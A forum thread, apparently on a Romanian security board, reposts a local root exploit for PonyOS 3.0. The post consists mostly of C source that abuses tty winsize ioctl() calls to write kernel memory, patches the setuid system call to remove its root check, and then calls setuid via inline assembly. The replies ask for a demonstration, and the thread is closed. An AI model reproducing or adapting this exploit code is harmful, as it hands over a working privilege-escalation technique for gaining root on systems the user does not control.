Jump to content

PonyOS 3.0 tty ioctl() Privilege Escalation

Recommended Posts

# Exploit Title: PonyOS <= 3.0 tty ioctl() local kernel exploit
# Google Dork: [if applicable]
# Date: 29th June 2015
# Exploit Author: HackerFantastic
# Vendor Homepage: www.ponyos.org
# Software Link: [download link if available]
# Version: [app version] PonyOS <= 3.0
# Tested on: PonyOS 3.0
# CVE : N/A

# Source: https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/applejack.c

/* PonyOS <= 3.0 tty ioctl() root exploit
PonyOS 0.4.99-mlp had two kernel vulnerabilities
disclosed in April 2013 that could be leveraged
to read/write arbitrary kernel memory. This is
due to tty winsize ioctl() allowing to read/write
arbitrary memory. This exploit patches the setuid
system call to remove a root uid check allowing
any process to obtain root privileges.

John Cartwright found these flaws and others here:

Written for educational purposes only. Enjoy!

-- prdelka

#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>

int main(){
struct winsize ws;
printf("[+] PonyOS <= 3.0 ioctl() local root exploit\n");
ioctl(0, TIOCSWINSZ, &ws);
ioctl(0, TIOCGWINSZ, (void *)0x0010f101);
printf("[-] patched sys_setuid()\n");
__asm("movl $0x18,%eax");
__asm("xorl %ebx,%ebx");
__asm("int $0x7F");
printf("[-] Got root?\n");


@Byte-ul nu am timp sa fac demo si nici "resursele necesare" am sa inchid thread-ul pentru a evita offtopic-ul. :)

Edited by Aerosol
Link to comment
Share on other sites

Poti face un demo care arata cum se foloseste aceasta vulnerabilitate? :)


Up. Probabil erai ocupat cu crearea de articole interesante si nu ai vazut postul meu.

Edited by Ganav
Post dublu
Link to comment
Share on other sites

This topic is now closed to further replies.

  • Create New...